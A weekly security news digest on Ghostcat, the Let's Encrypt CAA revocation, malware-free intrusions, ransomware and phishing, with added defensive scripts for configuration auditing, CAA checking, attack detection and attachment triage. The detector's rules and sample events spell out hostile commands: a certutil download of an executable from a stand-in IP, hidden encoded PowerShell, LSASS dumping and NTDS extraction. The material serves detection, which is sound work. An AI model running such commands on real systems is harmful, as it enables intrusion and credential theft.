Welcome to the 16th edition of the Secjuice Squeeze, a curated selection of interesting security articles and infosec news that you may have missed, lovingly prepared for you every week. This week's volume was compiled by Secjuice writers Bhumish Gajjar and Mike Peterson.
Active scans for the Ghostcat vulnerability on the rise, patch now!
Ghostcat (CVE-2020-1938) is a critical vulnerability in Apache Tomcat's Apache JServ Protocol (AJP) connector, rated CVSS 9.8. It affects Tomcat versions 6.x through 9.x. Apache has already released fixed versions for the supported branches (7.0.100, 8.5.51 and 9.0.31); Tomcat 6.x is end-of-life and receives no fix.
An attacker who can reach the AJP port (8009 by default, and in pre-fix installations the connector is enabled and bound to all interfaces out of the box) can read any file under a web application's root, including configuration files such as WEB-INF/web.xml and the application's source. If the application also accepts file uploads, the attacker can upload content containing JSP code and have Tomcat process it as a JSP, which results in remote code execution. Tenable notes that multiple PoC exploits are already available on GitHub, and Bad Packets reports that "mass scanning activity targeting this vulnerability has already begun. PATCH NOW!"
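The first thing a practitioner wants after reading the above is a way to find AJP connectors that scanners will reach. The following audit is an added example written for this digest, not Apache Tomcat's own tooling; the two server.xml documents it contains are constructed, and the `address`, `secret` and `secretRequired` attributes are the ones documented for the fixed 8.5.51+/9.0.31+ releases (Tomcat 7.0.100 spells the secret `requiredSecret`).

```python
"""Audit a Tomcat server.xml for AJP connectors that Ghostcat-style scanning
would reach. Added example, not Apache Tomcat's own tooling; the server.xml
documents below are constructed for this example."""
import xml.etree.ElementTree as ET

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed: the AJP connector as it shipped enabled in server.xml before
# the fixed releases, bound to every interface with no shared secret.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
    <Engine name="Catalina" defaultHost="localhost"/>
  </Service>
</Server>"""

# Constructed: the same connector restricted to loopback and requiring the
# shared secret that the fixed releases support via secret/secretRequired.
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="replace-with-a-long-random-value"
               redirectPort="8443"/>
    <Engine name="Catalina" defaultHost="localhost"/>
  </Service>
</Server>"""


def audit_ajp_connectors(server_xml):
    """Return one {"port", "issues"} entry per AJP connector; [] issues = nothing to flag."""
    root = ET.fromstring(server_xml)
    report = []
    for conn in root.iter("Connector"):
        protocol = conn.get("protocol", "HTTP/1.1")
        if not protocol.upper().startswith("AJP"):
            continue
        issues = []
        # Pre-fix releases bind to all interfaces when 'address' is absent,
        # so an unset address is treated as exposed.
        address = conn.get("address", "0.0.0.0")
        if address not in LOOPBACK:
            issues.append("bound to %s instead of loopback" % address)
        secret = conn.get("secret") or conn.get("requiredSecret")
        if not secret:
            issues.append("no AJP shared secret configured")
        if conn.get("secretRequired", "true").lower() != "true":
            issues.append("secretRequired explicitly disabled")
        report.append({"port": conn.get("port"), "issues": issues})
    return report


def is_exposed(server_xml):
    """True if any AJP connector in the document has at least one finding."""
    return any(entry["issues"] for entry in audit_ajp_connectors(server_xml))


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(label, audit_ajp_connectors(doc))
```

A clean audit does not replace patching: releases before the fix ignore the secret attributes, so the connector must be upgraded as well as locked down, and if nothing in front of Tomcat actually speaks AJP the simplest fix is to comment the connector out entirely.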
CIA accused of hacking Chinese targets for 11 years
Qihoo 360, the largest cybersecurity vendor in China, has accused the CIA of hacking Chinese organizations for more than 11 years. Its report claims the CIA targeted China's aviation industry, scientific research institutions, petroleum industry, Internet companies, and government agencies.
Qihoo says the malware samples it recovered carry compilation timestamps consistent with working hours in the U.S. East Coast time zone. The samples were compared against the trove of CIA digital spy tools published by WikiLeaks in 2017 (the Vault 7 release). The report closely resembles one published by Qi-Anxin last September, which alleged that the CIA had targeted the Chinese aviation sector.
Let's Encrypt to revoke 3 million TLS certificates
Let's Encrypt, the most popular free certificate authority, said it will revoke 3 million TLS certificates on Wednesday, March 4. The move is due to a Certificate Authority Authorization (CAA) bug. CAA records are DNS records in which a domain owner states which CAs may issue for that domain, and a CA must check them shortly before issuance; the bug affected how Let's Encrypt's software performed that check.
The bug was introduced into Boulder, Let's Encrypt's CA software, in July; it was discovered last Sunday and patched the same day. When a certificate request covered several domain names that needed a CAA recheck, Boulder checked one of those names repeatedly instead of checking each of them once. It affects 3 million certificates, i.e., 2.6 percent of those currently active. Subscribers say they were notified of the revocation on Tuesday and given 24 hours to renew before their certificates were revoked.
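To make the failure mode concrete, here is a per-name CAA recheck of the kind a CA must run before issuing an order. It is an added example written for this digest following RFC 8659 semantics, not Boulder's code; the zone data is a constructed dictionary standing in for live DNS lookups, and the issuer domain `letsencrypt.org` is the one Let's Encrypt publishes for its CAA `issue` tag. The point of `recheck_caa` is the one the Boulder bug violated: every name on the order is checked exactly once and the order is issued only if all of them pass.

```python
"""Per-name CAA recheck of the kind a CA must do before issuing.
Added example following RFC 8659 semantics; it is not Boulder's code. The
zone data is a constructed dictionary standing in for live DNS lookups."""

ISSUER = "letsencrypt.org"
KNOWN_TAGS = {"issue", "issuewild", "iodef"}
CRITICAL = 128

# Constructed CAA data: name -> list of (flags, tag, value). Names absent from
# the dict have no CAA records, which is what an empty DNS answer means.
CONSTRUCTED_CAA = {
    "example.com": [(0, "issue", "letsencrypt.org")],
    "example.org": [(0, "issue", "digicert.com")],
    "example.net": [(0, "issue", "letsencrypt.org")],
    "api.example.net": [(CRITICAL, "futuretag", "opaque")],  # unknown critical tag
    "example.io": [(0, "issue", ";")],                       # nobody may issue
    "wild.example.io": [(0, "issuewild", "letsencrypt.org; validationmethods=dns-01")],
}


def relevant_caa_set(name, zone):
    """Climb toward the root and return the first non-empty CAA set (RFC 8659 s3).
    A wildcard request uses the records of the name with the '*.' removed."""
    if name.startswith("*."):
        name = name[2:]
    labels = name.split(".")
    for i in range(len(labels)):
        records = zone.get(".".join(labels[i:]))
        if records:
            return records
    return []


def caa_permits(name, zone, issuer=ISSUER):
    """Decide whether `issuer` may issue for `name` under the relevant CAA set."""
    wildcard = name.startswith("*.")
    records = relevant_caa_set(name, zone)
    if not records:
        return True  # no CAA anywhere up the tree: no restriction
    for flags, tag, _ in records:
        if flags & CRITICAL and tag.lower() not in KNOWN_TAGS:
            return False  # critical property we do not understand: refuse
    chosen = [r for r in records if r[1].lower() == "issuewild"]
    if not wildcard or not chosen:
        chosen = [r for r in records if r[1].lower() == "issue"]
    if not chosen:
        return True  # the relevant set carries no property restricting this request
    for _, _, value in chosen:
        # value is "<issuer-domain>[; param=value ...]"; ";" alone means nobody
        domain = value.split(";", 1)[0].strip().lower()
        if domain == issuer.lower():
            return True
    return False


def recheck_caa(names, zone=CONSTRUCTED_CAA, issuer=ISSUER):
    """Recheck every name on the order exactly once and report per-name results.
    The order may only be issued if every value is True."""
    return {name: caa_permits(name, zone, issuer) for name in names}


if __name__ == "__main__":
    order = ["example.com", "www.example.com", "example.org", "*.wild.example.io"]
    verdicts = recheck_caa(order)
    print(verdicts, "issue:", all(verdicts.values()))
```

Run against the constructed zone, the four-name order above is refused because `example.org` authorizes a different CA; a recheck that looked at `example.com` four times would have issued it.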
Report: most cyberattacks in 2019 were malware-free
It appears that the use of malware in coordinated cyberattacks is declining. Instead, attackers increasingly rely on hands-on-keyboard techniques driven by human adversaries: "old school" command-line activity, abuse of legitimate administrative tools already present on the system, stolen credentials, and of course social engineering.
This spells trouble for defenders. Such intrusions leave no malicious binary for antivirus to flag, so they blend in with ordinary administrative activity and are hard to spot for people and automated tooling alike. The open question among CrowdStrike researchers is whether the trend will continue.
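Because there is no binary to flag, detection has to come from what legitimate tools are being told to do and who spawned them. The following rules are an added example written for this digest, not CrowdStrike's detection logic; the process-creation events are constructed Sysmon-style records, and the hosts, users and IP address in them are made up.

```python
"""Flag hands-on-keyboard, malware-free tradecraft in process-creation events.
Added example of the kind of detection logic the report's findings call for;
it is not CrowdStrike's. The events are constructed Sysmon-style records."""
import re

# Command-line patterns for legitimate tools being used the way intruders use them.
CMDLINE_RULES = [
    ("encoded PowerShell", re.compile(r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I)),
    ("certutil used as a downloader", re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I)),
    ("remote process creation via WMI", re.compile(r"wmic(\.exe)?\b.*\bprocess\s+call\s+create\b", re.I)),
    ("LSASS dump via comsvcs.dll", re.compile(r"rundll32(\.exe)?\b.*comsvcs\.dll.*MiniDump", re.I)),
    ("NTDS extraction with ntdsutil", re.compile(r"ntdsutil(\.exe)?\b.*\bifm\b", re.I)),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(event):
    """Return the list of rule names that fire for one process-creation event."""
    hits = []
    for name, pattern in CMDLINE_RULES:
        if pattern.search(event["cmdline"]):
            hits.append(name)
    # Parent/child relationship rule: Office applications have no business spawning shells.
    if basename(event["parent"]) in OFFICE_APPS and basename(event["image"]) in SHELLS:
        hits.append("Office application spawned a shell or script host")
    return hits


def detect(events):
    """Run every event through the rules; return (host, user, rule, cmdline) tuples."""
    findings = []
    for ev in events:
        for rule in analyse_event(ev):
            findings.append((ev["host"], ev["user"], rule, ev["cmdline"]))
    return findings


# Constructed events (Sysmon Event ID 1 fields, trimmed to what the rules need).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\alice", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"host": "WS01", "user": "CORP\\alice", "parent": "C:\\Windows\\System32\\svchost.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "FS02", "user": "CORP\\svc_backup", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/u.txt C:\\Users\\Public\\u.exe"},
    {"host": "FS02", "user": "CORP\\svc_backup", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "cmdline": "wmic /node:DC01 process call create \"cmd /c whoami > c:\\temp\\o.txt\""},
    {"host": "WS07", "user": "CORP\\bob", "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c start /min \"\" wscript.exe %TEMP%\\upd.vbs"},
    {"host": "DC01", "user": "CORP\\admin", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe Get-Service -Name Spooler"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The last sample event, an administrator querying a service with PowerShell, is deliberately benign: the rules key on how a tool is invoked and by what, not on the tool itself, which is what keeps living-off-the-land detection from drowning in noise.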
North American steel manufacturer temporarily shut down due to ransomware
EVRAZ, one of the world's largest steel manufacturers and mining operators, has been hit by ransomware that took down its North American operations across Canada and the U.S. The infection has been identified as the Ryuk ransomware strain.
Temporary layoffs are being issued, and they are hitting employees' wallets. The company's IT team is reportedly working to contain the infection. EVRAZ has not officially confirmed that its systems were infected, but employees have been venting to the media.
Trio of data breaches hit U.S. and global consumers
Data breaches are on the rise, and this week is just the latest evidence of that. According to reports, three separate enterprise data breaches have hit clothing retailer J.Crew, U.S. carrier T-Mobile, and two subsidiaries of cruise line Carnival.
There are a lot of unknowns, including the number of impacted customers at J.Crew and T-Mobile, but some of the leaked data is highly sensitive. While Carnival's breach involved the fewest compromised customers, the exposed data included Social Security numbers and credit card information. As a consumer you cannot prevent enterprise breaches, but these examples should raise hard questions about whom you trust with your data.
Scammers continue to leverage coronavirus in cyberattacks
Malicious actors are continuing to exploit current events and tragedies to target vulnerable victims. Case in point: security researchers spotted two separate malware campaigns using the coronavirus as a lure.
One campaign is a phishing email carrying what purports to be a PDF of COVID-19 safety measures; the attachment actually drops the Remcos RAT along with a VBS script. The other uses a Microsoft Word document whose malicious macros drop a backdoor on the victim's system. The moral of the story: tell everyone you know to be careful what they click on.
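Both lures can be caught at the mail gateway before anyone clicks: the first by comparing the declared file type with the file's leading bytes, the second by looking for a VBA project inside the Office container. The triage below is an added example written for this digest, not the researchers' tooling; every attachment it inspects is constructed in the block, and the file names are made up.

```python
"""Mail-attachment triage for the two lures described above: a file presented
as a PDF whose bytes are something else, and an Office document carrying VBA
macros. Added example, not the researchers' tooling; all file bytes are
constructed in this block."""
import io
import zipfile

MAGIC = [
    (b"%PDF-", "pdf"),
    (b"MZ", "exe"),                                    # PE executable
    (b"PK\x03\x04", "zip"),                            # OOXML (docx/docm/xlsm) is a zip
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),      # legacy .doc/.xls container
]
SCRIPT_EXTS = {"vbs", "vbe", "js", "jse", "hta", "exe", "scr", "bat", "cmd", "ps1"}
DOC_EXTS = {"doc", "docx", "docm", "xls", "xlsx", "xlsm", "ppt", "pptx", "pptm"}


def sniff(data):
    """Content type from leading bytes; 'unknown' if nothing matches."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def ooxml_has_macros(data):
    """True if an OOXML zip carries a VBA project (word/, xl/ or ppt/ vbaProject.bin)."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return any(name.lower().endswith("vbaproject.bin") for name in z.namelist())


def triage(filename, data):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    findings = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    kind = sniff(data)
    if ext in SCRIPT_EXTS:
        findings.append("script or executable attachment (.%s)" % ext)
    if ext == "pdf" and kind != "pdf":
        findings.append("named .pdf but content is %s" % kind)
    if ext in DOC_EXTS:
        if kind == "zip" and ooxml_has_macros(data):
            findings.append("Office document contains VBA macros")
        elif kind == "ole":
            findings.append("legacy binary Office file: inspect for macros (e.g. with oletools)")
    return findings


def make_ooxml_doc(with_macros):
    """Build a minimal Word OOXML container in memory (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 28)
    return buf.getvalue()


# Constructed attachments mirroring the lures in the story.
FAKE_PDF = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56           # PE bytes named as a PDF
REAL_PDF = b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n1 0 obj\n<<>>\nendobj\n"
MACRO_DOC = make_ooxml_doc(True)
CLEAN_DOC = make_ooxml_doc(False)

if __name__ == "__main__":
    for name, blob in [("COVID-19_Safety_Measures.pdf", FAKE_PDF),
                       ("COVID-19_Safety_Measures.pdf.vbs", b"Set o = CreateObject(\"WScript.Shell\")"),
                       ("coronavirus_update.docm", MACRO_DOC),
                       ("quarterly_report.docx", CLEAN_DOC),
                       ("invoice.pdf", REAL_PDF)]:
        print(name, triage(name, blob))
```

The magic-byte check is deliberately independent of the extension, so a double extension such as `.pdf.vbs` is caught by the script-extension rule while a renamed executable is caught by the content mismatch; legacy binary Office files are only flagged for manual inspection here because parsing their OLE streams needs a dedicated library.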
Phishers used Microsoft OneNote to evade detection
Phishing campaigns are a dime a dozen, but occasionally one surfaces that uses novel methods and techniques. Researchers at Cofense discovered a campaign that abused Microsoft OneNote, a digital notebook that automatically saves and syncs notes, to evade antivirus and other detection tools.
Specifically, the attacker used a OneNote page to experiment with various phishing lures that either loaded the Agent Tesla keylogger onto the victim's device or linked to a credential-phishing page, and sometimes both. To further mask the attack, the threat actor sent the OneNote link disguised as an order invoice and then, over several weeks, swapped out that page's layout, malware samples, and phishing links.